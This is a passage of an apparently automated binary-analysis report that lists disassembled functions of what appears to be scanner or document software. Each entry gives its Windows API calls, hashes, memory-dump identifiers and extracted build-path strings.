                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$Enter$Value$Exception@8Throw
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\inc\handlemapawl.h
                                                                                                • API String ID: 1399577766-2023502347
                                                                                                • Opcode ID: 2fd1d986a6a5ddde7f29fb9af2d290a797eaf2edbd7307964ac987c10dc595e0
                                                                                                • Instruction ID: ee9d16d4a9a5e08ccfe6ad7ca15c14eae3e8705997f691b6808ed2373e12f412
                                                                                                • Opcode Fuzzy Hash: 2fd1d986a6a5ddde7f29fb9af2d290a797eaf2edbd7307964ac987c10dc595e0
                                                                                                • Instruction Fuzzy Hash: 6531CD71900698AFDB00DF59CC41BAEBFB8EB08324F14415AE858A7391C3B96A05CBE5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,?), ref: 0047A33E
                                                                                                • GetLastError.KERNEL32 ref: 0047A34A
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,00000000,-0000000C,00000000,00000000,00000000,0000000D,?), ref: 0047A3C3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ByteCharCriticalMultiSectionValueWide$EnterErrorException@8LastLeaveThrow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\string.cpp$xMS
                                                                                                • API String ID: 3790927809-248745014
                                                                                                • Opcode ID: 2a549f5b86ee13f79ea157f6ffeadb6b510aab4505210b84aca45b4d38a956e3
                                                                                                • Instruction ID: 1719ffe606b533ad63808e2c60b72e15c0163f66e447fa95dc6a7f75e534c8f8
                                                                                                • Opcode Fuzzy Hash: 2a549f5b86ee13f79ea157f6ffeadb6b510aab4505210b84aca45b4d38a956e3
                                                                                                • Instruction Fuzzy Hash: B431AE71900309AFDB10DF58CC81BAFBBB8FF08700F10451AF919AB281D77599108B94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0040BAA0: InterlockedIncrement.KERNEL32(?), ref: 0040BACA
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 0048E25B
                                                                                                  • Part of subcall function 0048CE70: InterlockedIncrement.KERNEL32(00530380), ref: 0048CED2
                                                                                                  • Part of subcall function 0048CE70: InterlockedIncrement.KERNEL32(00530380), ref: 0048CEEB
                                                                                                  • Part of subcall function 00495600: InterlockedIncrement.KERNEL32(00000000), ref: 00495638
                                                                                                  • Part of subcall function 00495600: InterlockedDecrement.KERNEL32(?), ref: 00495642
                                                                                                  • Part of subcall function 00495600: InterlockedDecrement.KERNEL32(?), ref: 0049566D
                                                                                                  • Part of subcall function 00495600: InterlockedIncrement.KERNEL32(00000000), ref: 0049569C
                                                                                                  • Part of subcall function 00495600: InterlockedDecrement.KERNEL32(?), ref: 004956A6
                                                                                                  • Part of subcall function 00495600: InterlockedDecrement.KERNEL32(?), ref: 004956D1
                                                                                                  • Part of subcall function 0048C840: InterlockedIncrement.KERNEL32(?), ref: 0048C8EE
                                                                                                  • Part of subcall function 0048C840: InterlockedIncrement.KERNEL32(?), ref: 0048C8FB
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048E220
                                                                                                • InterlockedDecrement.KERNEL32(74E070F0), ref: 0048E238
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementIncrement
                                                                                                • String ID: xMS$xMS$xMS
                                                                                                • API String ID: 2172605799-2738134327
                                                                                                • Opcode ID: 4c536156e9040ed2798b8e72a12ca0ce849e600f5c8fe5172aa9b39b9ca2c7a6
                                                                                                • Instruction ID: da84545da5708da7cf7bc9424192261a4e8c497f60fd7a317e0ded36604b5b81
                                                                                                • Opcode Fuzzy Hash: 4c536156e9040ed2798b8e72a12ca0ce849e600f5c8fe5172aa9b39b9ca2c7a6
                                                                                                • Instruction Fuzzy Hash: A3218232500A49EBCB11EF55C881BAFBB79FF44714F104A5AF85167241D738EE018BA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00494314
                                                                                                • InterlockedIncrement.KERNEL32(00000001), ref: 00494324
                                                                                                  • Part of subcall function 004943A0: InterlockedIncrement.KERNEL32(?), ref: 004943E0
                                                                                                  • Part of subcall function 004943A0: InterlockedDecrement.KERNEL32(?), ref: 004943EA
                                                                                                  • Part of subcall function 004943A0: InterlockedIncrement.KERNEL32(00000001), ref: 0049440B
                                                                                                  • Part of subcall function 004943A0: InterlockedDecrement.KERNEL32(00000001), ref: 00494415
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00494351
                                                                                                • InterlockedDecrement.KERNEL32(000000FF), ref: 00494369
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementIncrement
                                                                                                • String ID: xMS$xMS
                                                                                                • API String ID: 2172605799-1285152028
                                                                                                • Opcode ID: 6e7b9f75f58b91a2ec3765a9637ed2eb57c7413d5082e68e9cbeda872f0038c9
                                                                                                • Instruction ID: 8f93e28d15bd9a676e6e8f8ddd36dc3c04576a345ac96cedb3dc424caf06916e
                                                                                                • Opcode Fuzzy Hash: 6e7b9f75f58b91a2ec3765a9637ed2eb57c7413d5082e68e9cbeda872f0038c9
                                                                                                • Instruction Fuzzy Hash: 5D31CBB5E01A19AFCB10DFA9D841A9EFBF9FF48710F10462AE818E3740D774A9118F94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsMenu.USER32 ref: 0043849F
                                                                                                • GetMenuStringW.USER32 ref: 004384D7
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004384E4
                                                                                                • GetMenuStringW.USER32 ref: 0043851B
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\menuawl.cpp, xrefs: 004384AF
                                                                                                • @fO, xrefs: 004384B9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Menu$CriticalSectionStringValue$EnterException@8IncrementInterlockedLeaveThrow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\menuawl.cpp
                                                                                                • API String ID: 1817801029-757197008
                                                                                                • Opcode ID: 592db66882e0e6badf0af42a6060bd08f1e68508757befc20cceda997b49d1ea
                                                                                                • Instruction ID: dc4589bfbe4ead6213865d660d1598974c607d3a2c59ab3f3c9fc97def4e6a68
                                                                                                • Opcode Fuzzy Hash: 592db66882e0e6badf0af42a6060bd08f1e68508757befc20cceda997b49d1ea
                                                                                                • Instruction Fuzzy Hash: 5921F275600305EBDB208F54CD06F6BBB68FF48714F10826AF909EB391D7B59910CB98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • LsaOpenPolicy.ADVAPI32(00000000,?,00000001,?), ref: 004A2185
                                                                                                • LsaNtStatusToWinError.ADVAPI32(00000000), ref: 004A2196
                                                                                                • SetLastError.KERNEL32(00000000), ref: 004A219F
                                                                                                  • Part of subcall function 00412440: GetLastError.KERNEL32(?,00491C3E,?,?,000000FF,74E070F0), ref: 0041244A
                                                                                                • LsaQueryInformationPolicy.ADVAPI32(00000000,00000005,?), ref: 004A21C7
                                                                                                • LsaNtStatusToWinError.ADVAPI32(00000000), ref: 004A21D2
                                                                                                • SetLastError.KERNEL32(00000000), ref: 004A21D5
                                                                                                • LsaClose.ADVAPI32(00000000), ref: 004A21E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Error$Last$PolicyStatus$CloseInformationOpenQuery
                                                                                                • String ID:
                                                                                                • API String ID: 2198119428-0
                                                                                                • Opcode ID: 0d7b59a7cf8586fac787ee0c3503c6dcf059d4573cded57e0d1f9daaca0362ab
                                                                                                • Instruction ID: 2033cbdaf564b4840dd9bd8c4c623a2b11bf8d8c87a02e933852728bf35a3fc8
                                                                                                • Opcode Fuzzy Hash: 0d7b59a7cf8586fac787ee0c3503c6dcf059d4573cded57e0d1f9daaca0362ab
                                                                                                • Instruction Fuzzy Hash: F0219571D00208AFDB109FA5DD45BAFBBBCFB59720F104226F910A3291DB785454CAA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • lstrcpynW.KERNEL32(?,?,?,?), ref: 0043A21E
                                                                                                • lstrcpynW.KERNEL32(?,?,00000100), ref: 0043A252
                                                                                                • lstrcpynW.KERNEL32(?,?,00000040), ref: 0043A26D
                                                                                                • Shell_NotifyIconW.SHELL32 ref: 0043A28D
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 0043A1B6
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\trayiconawl.cpp, xrefs: 0043A1AC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: lstrcpyn$CriticalSectionValue$EnterException@8IconLeaveNotifyShell_Throw
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\trayiconawl.cpp
                                                                                                • API String ID: 2912003336-2767120480
                                                                                                • Opcode ID: 363abdc4b79ec5d57a5bb069d6b978b09ca781e544c97bc7a3b8d65074c2d72b
                                                                                                • Instruction ID: b66c4d7cd2174b97e03b330942b5a543770981e7415d3bca8b4a1aad010177ac
                                                                                                • Opcode Fuzzy Hash: 363abdc4b79ec5d57a5bb069d6b978b09ca781e544c97bc7a3b8d65074c2d72b
                                                                                                • Instruction Fuzzy Hash: A1216DB15043049FD321DF18C845B87BBE8EB48318F00891EF998D7391E7B8E514CB96
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(00000001), ref: 0043F1F9
                                                                                                • IsWindow.USER32(00000001), ref: 0043F232
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                  • Part of subcall function 00444F40: InterlockedDecrement.KERNEL32(?), ref: 00444F95
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValueWindow$DecrementEnterException@8InterlockedLeaveThrow
                                                                                                • String ID: @fO$@fO$@fO$d:\build\teamagent\_work\1\s\0\awl\src\scrollingawl.cpp
                                                                                                • API String ID: 567831395-2730753272
                                                                                                • Opcode ID: d91b198176c07ef16ce75520f5c152dac83ce39dca7e675d2ee5bb10f6cc628d
                                                                                                • Instruction ID: 83864f5bc6b420f6b903908260a51bb3d3e19dc965f3b788d6a310b6e39af4c3
                                                                                                • Opcode Fuzzy Hash: d91b198176c07ef16ce75520f5c152dac83ce39dca7e675d2ee5bb10f6cc628d
                                                                                                • Instruction Fuzzy Hash: 4D110A70B803009BEB20AB25DD07F3723C49B64B04F15947FB906DB6C2E7BDE8048A48
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • TlsGetValue.KERNEL32(?,00000000,0053007C,000000FF,?,004758BF,0053007C,00000000), ref: 00484441
                                                                                                • GetProcessHeap.KERNEL32(00000000,0000000C,?,004758BF,0053007C,00000000), ref: 00484454
                                                                                                • HeapAlloc.KERNEL32(00000000,?,004758BF,0053007C,00000000), ref: 0048445B
                                                                                                • TlsSetValue.KERNEL32(?,00000000), ref: 00484494
                                                                                                • EnterCriticalSection.KERNEL32 ref: 004844AA
                                                                                                • LeaveCriticalSection.KERNEL32(00534C90,00000000), ref: 004844D0
                                                                                                  • Part of subcall function 0046C190: TlsGetValue.KERNEL32(74E070F0,000000FF,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1B2
                                                                                                  • Part of subcall function 0046C190: TlsSetValue.KERNEL32(0053011C,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1D0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Value$CriticalHeapSection$AllocEnterLeaveProcess
                                                                                                • String ID: Ot Ut
                                                                                                • API String ID: 1903230167-2482394718
                                                                                                • Opcode ID: 6af8b09ac4753c637ad91f86b13a419ecc3f38424dacd5296f55dc0563b890f7
                                                                                                • Instruction ID: 8b31b41707330b541d43540f633f961667301fc15fa5af29dec2c576bb0eb278
                                                                                                • Opcode Fuzzy Hash: 6af8b09ac4753c637ad91f86b13a419ecc3f38424dacd5296f55dc0563b890f7
                                                                                                • Instruction Fuzzy Hash: 56219F71401746AFD720DF58D808BAEBFA8FF44720F104619E861A7791D7B49A00CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0049D270: EnterCriticalSection.KERNEL32(00000170,?,?,00000000,004E6BCC,000000FF), ref: 0049D29E
                                                                                                  • Part of subcall function 0049D270: LeaveCriticalSection.KERNEL32(00000170,00000000), ref: 0049D2D8
                                                                                                  • Part of subcall function 0049F170: EnterCriticalSection.KERNEL32(0000002C), ref: 0049F1A8
                                                                                                  • Part of subcall function 0049F170: LeaveCriticalSection.KERNEL32(0000002C), ref: 0049F1CB
                                                                                                  • Part of subcall function 0049F170: Sleep.KERNEL32(00000064), ref: 0049F1DB
                                                                                                • EnterCriticalSection.KERNEL32(00000170), ref: 0049C08A
                                                                                                  • Part of subcall function 0049D8B0: InterlockedDecrement.KERNEL32(00000008), ref: 0049D907
                                                                                                • LeaveCriticalSection.KERNEL32(00000170), ref: 0049C0B7
                                                                                                • EnterCriticalSection.KERNEL32(005356E0), ref: 0049C0CD
                                                                                                • InterlockedDecrement.KERNEL32(00000005), ref: 0049C0FE
                                                                                                • LeaveCriticalSection.KERNEL32(005356E0), ref: 0049C132
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$DecrementInterlocked$Sleep
                                                                                                • String ID: VS
                                                                                                • API String ID: 1195939809-4205997568
                                                                                                • Opcode ID: eda22c47f99bcb9899715a20d20c7ce30f2eefd48de51bdc38941520d9587333
                                                                                                • Instruction ID: 311fb0b92173c302d4cdb2366a4ad59fc75b094efb50e90564853ba4edc3b846
                                                                                                • Opcode Fuzzy Hash: eda22c47f99bcb9899715a20d20c7ce30f2eefd48de51bdc38941520d9587333
                                                                                                • Instruction Fuzzy Hash: 8B31A270904654DFDB10DF58C94ABAABFF4BF05314F5441A9E8085B383C7B9A904CBE5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00502800,?,?,?,0043F3D3,?), ref: 00439460
                                                                                                • TerminateProcess.KERNEL32(00000000,?,?,?,0043F3D3,?), ref: 00439467
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004394BA
                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 004394E5
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 004394EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentTerminate$DecrementInterlocked
                                                                                                • String ID: xMS
                                                                                                • API String ID: 613635573-303485436
                                                                                                • Opcode ID: f90afc9ea003a172110892f7cb8649610521ee64dfb35bca80a7e2627f64ad7c
                                                                                                • Instruction ID: 0e5063a654b55e2c1f45d9a623ebeac0d7eb8ca7d8b889311ea3e3c03016c0b3
                                                                                                • Opcode Fuzzy Hash: f90afc9ea003a172110892f7cb8649610521ee64dfb35bca80a7e2627f64ad7c
                                                                                                • Instruction Fuzzy Hash: 8A21DEB1905284EFE711DF98CC08BAEBFB8FF45710F24415AE501A7382C7B91A05CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004D0019: _free.LIBCMT ref: 004D0042
                                                                                                • _free.LIBCMT ref: 004D0320
                                                                                                  • Part of subcall function 004CB2DE: HeapFree.KERNEL32(00000000,00000000,?,004D0047,?,00000000,?,00000000,?,004D02EB,?,00000007,?,?,004D082C,?), ref: 004CB2F4
                                                                                                  • Part of subcall function 004CB2DE: GetLastError.KERNEL32(?,?,004D0047,?,00000000,?,00000000,?,004D02EB,?,00000007,?,?,004D082C,?,?), ref: 004CB306
                                                                                                • _free.LIBCMT ref: 004D032B
                                                                                                • _free.LIBCMT ref: 004D0336
                                                                                                • _free.LIBCMT ref: 004D038A
                                                                                                • _free.LIBCMT ref: 004D0395
                                                                                                • _free.LIBCMT ref: 004D03A0
                                                                                                • _free.LIBCMT ref: 004D03AB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: c8699ee14daf37cc58efb2300f53fe1e1c805dd529e3dc410262eb2a605d1c3a
                                                                                                • Instruction ID: 2507bc3c75db9b3936f7493d56c6979bb9ce6080b51fc7de2b82154b37d633df
                                                                                                • Opcode Fuzzy Hash: c8699ee14daf37cc58efb2300f53fe1e1c805dd529e3dc410262eb2a605d1c3a
                                                                                                • Instruction Fuzzy Hash: F3117231540708BADA21BF72DC07FCB77DD9F04708F40082FB699A7292DBACB5049696
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004A131D
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004A1342
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004A135A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlocked
                                                                                                • String ID: xMS$xMS$xMS
                                                                                                • API String ID: 3448037634-2738134327
                                                                                                • Opcode ID: f20326e87539a89958369e061e1cc02726a6364682510430b42904f9cc92d973
                                                                                                • Instruction ID: b9734bc1b937746d03099c473aa0797f2411d35fdb809277c0ff6b5fc1799e0a
                                                                                                • Opcode Fuzzy Hash: f20326e87539a89958369e061e1cc02726a6364682510430b42904f9cc92d973
                                                                                                • Instruction Fuzzy Hash: 3201A532500E02ABD7205F5ACC41A6FFBE9FF45B20F000A1EF55593751D774AC004795
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0041E49C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValue$EnterException@8IncrementInterlockedLeaveThrow
                                                                                                • String ID: ..\Shared\shared.cpp$@fO$autobrightness by scanner$default$manual
                                                                                                • API String ID: 3559256536-268111258
                                                                                                • Opcode ID: 21554af6cbe9cf90302a3e43c1bfbdb0c3264566b05e992fde6bc46fc4e74a89
                                                                                                • Instruction ID: 89ae940b1af95c91ae5cec817e24604558c75ecc91a17b60b694af9dff9abd8b
                                                                                                • Opcode Fuzzy Hash: 21554af6cbe9cf90302a3e43c1bfbdb0c3264566b05e992fde6bc46fc4e74a89
                                                                                                • Instruction Fuzzy Hash: 5601D275A84308ABE3206F598E07BBA7AA4B704F14F10821BF90162BC1D7FD1900829E
                                                                                                Uniqueness

